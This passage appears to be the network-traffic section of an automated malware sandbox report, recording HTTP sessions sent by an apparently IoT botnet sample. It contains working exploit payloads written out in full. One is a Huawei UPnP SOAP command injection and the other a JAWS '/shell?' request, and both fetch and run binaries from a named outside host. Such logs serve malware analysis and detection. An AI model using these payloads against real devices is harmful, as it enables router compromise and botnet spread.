65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:51.012680054 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:29.919260025 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            36192.168.2.235328669.85.94.24680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:13.711292982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:13.821418047 CET503INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:31:13 GMT
                                                            Server: Server
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            37192.168.2.234592264.182.87.5980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:13.719949961 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:13.840295076 CET525INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:13 GMT
                                                            Server: Apache
                                                            Content-Length: 347
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            38192.168.2.235382418.154.51.16580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:13.820472956 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:14.040404081 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            39192.168.2.234512045.135.232.580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:13.845207930 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:14.089647055 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.25.2
                                                            Date: Fri, 26 Jan 2024 14:31:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            40192.168.2.233638046.23.188.5580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:13.988643885 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:14.266448021 CET62INHTTP/1.0 400 Bad Request
                                                            Connection: Keep-Alive
                                                            Jan 26, 2024 15:31:14.266465902 CET112INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68
                                                            Data Ascii: Keep-Alive: timeout=20X-Frame-Options: SAMEORIGINContent-Type: text/html<h1>Bad Request</h1>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            41192.168.2.2348598115.42.222.13180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:14.039427996 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            42192.168.2.234106043.140.243.5680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:14.053817987 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:14.400973082 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:14 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            43192.168.2.2360054108.186.223.7480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:15.563497066 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:15.720319033 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:15 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            44192.168.2.2346586206.189.92.21680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:15.731033087 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:16.054904938 CET453INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:15 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                            X-Content-Type-Options: nosniff
                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            45192.168.2.2337304163.5.153.17680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:15.922580004 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:16.124969006 CET514INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:16 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 320
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2d 31 35 38 2d 33 37 2d 32 31 38 2e 73 74 61 74 69 63 2e 68 76 76 63 2e 75 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 45-158-37-218.static.hvvc.us Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            46192.168.2.2344144171.236.63.23380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:16.333457947 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:16.764549017 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:16 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:16 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 63 33 33 34 33 31 62 26 23 34 36 3b 31 37 30 36 32 37 39 34 37 36 26 23 34 36 3b 39 37 30 39 39 30 63 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;3c33431b&#46;1706279476&#46;970990c8</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            47192.168.2.2356146104.119.82.8780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:16.948086023 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
